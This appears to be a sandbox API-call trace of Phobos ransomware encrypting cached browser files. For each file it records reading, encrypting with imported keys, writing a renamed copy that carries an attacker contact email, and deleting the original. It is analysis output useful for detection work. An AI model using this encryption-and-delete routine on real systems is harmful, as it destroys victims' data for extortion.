[0176.682] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\benefits-5-mobile[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\benefits-5-mobile[1].png")) returned 1 [0176.683] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ie8[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\ie8[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.684] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=102) returned 1 [0176.684] CloseHandle (hObject=0x190) returned 1 [0176.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ie8[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\ie8[1].txt")) returned 0x2020 [0176.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ie8[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\ie8[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ie8[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\ie8[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.684] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.684] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ie8[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\ie8[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.685] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0176.685] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.685] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x66, lpOverlapped=0x0) returned 1 [0176.708] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0176.708] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x70, lpOverlapped=0x0) returned 1 [0176.709] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0176.741] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.741] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.741] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.741] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.741] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.741] CloseHandle (hObject=0x190) returned 1 [0176.741] CloseHandle (hObject=0x17c) returned 1 [0176.742] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ie8[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\ie8[1].txt")) returned 1 [0176.748] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\only[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\only[1].htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.749] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=0) returned 1 [0176.749] CloseHandle (hObject=0x17c) returned 1 [0176.749] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\Passport[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\passport[1].htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.750] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=320) returned 1 [0176.750] CloseHandle (hObject=0x17c) returned 1 [0176.750] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\Passport[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\passport[1].htm")) returned 0x2020 [0176.750] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\Passport[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\passport[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\Passport[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\passport[1].htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.750] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.751] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\Passport[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\passport[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.751] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0176.751] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.751] ReadFile (in: hFile=0x17c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x140, lpOverlapped=0x0) returned 1 [0176.781] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x150, dwBufLen=0x150 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x150) returned 1 [0176.781] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x150, lpOverlapped=0x0) returned 1 [0176.781] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0176.781] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.781] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.781] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.781] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.782] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.782] CloseHandle (hObject=0x17c) returned 1 [0176.782] CloseHandle (hObject=0x190) returned 1 [0176.782] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\Passport[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\passport[1].htm")) returned 1 [0176.783] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\postmessageRelay[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\postmessagerelay[1].htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.784] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=506) returned 1 [0176.784] CloseHandle (hObject=0x190) returned 1 [0176.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\postmessageRelay[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\postmessagerelay[1].htm")) returned 0x2020 [0176.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\postmessageRelay[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\postmessagerelay[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\postmessageRelay[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\postmessagerelay[1].htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.784] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.784] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\postmessageRelay[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\postmessagerelay[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.785] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0176.785] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.785] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1fa, lpOverlapped=0x0) returned 1 [0176.786] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x200, dwBufLen=0x200 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x200) returned 1 [0176.786] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x200, lpOverlapped=0x0) returned 1 [0176.787] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0176.787] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.787] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0176.787] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.787] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0176.787] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.787] CloseHandle (hObject=0x190) returned 1 [0176.787] CloseHandle (hObject=0x17c) returned 1 [0176.787] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\postmessageRelay[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\postmessagerelay[1].htm")) returned 1 [0176.788] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\search[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\search[1].htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.788] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=105071) returned 1 [0176.788] CloseHandle (hObject=0x17c) returned 1 [0176.788] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\search[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\search[1].htm")) returned 0x2020 [0176.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\search[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\search[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\search[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\search[1].htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.789] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.789] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\search[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\search[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.789] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0176.789] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.789] ReadFile (in: hFile=0x17c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x19a6f, lpOverlapped=0x0) returned 1 [0176.795] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x19a70, dwBufLen=0x19a70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x19a70) returned 1 [0176.796] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x19a70, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x19a70, lpOverlapped=0x0) returned 1 [0176.798] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0176.798] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.798] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.798] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.798] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.798] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.798] CloseHandle (hObject=0x17c) returned 1 [0176.798] CloseHandle (hObject=0x190) returned 1 [0176.798] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\search[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\search[1].htm")) returned 1 [0176.800] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\uhf-west-european-default.min[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\uhf-west-european-default.min[1].css"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.807] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=116827) returned 1 [0176.807] CloseHandle (hObject=0x190) returned 1 [0176.807] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\uhf-west-european-default.min[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\uhf-west-european-default.min[1].css")) returned 0x2020 [0176.807] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\uhf-west-european-default.min[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\uhf-west-european-default.min[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\uhf-west-european-default.min[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\uhf-west-european-default.min[1].css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.807] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, 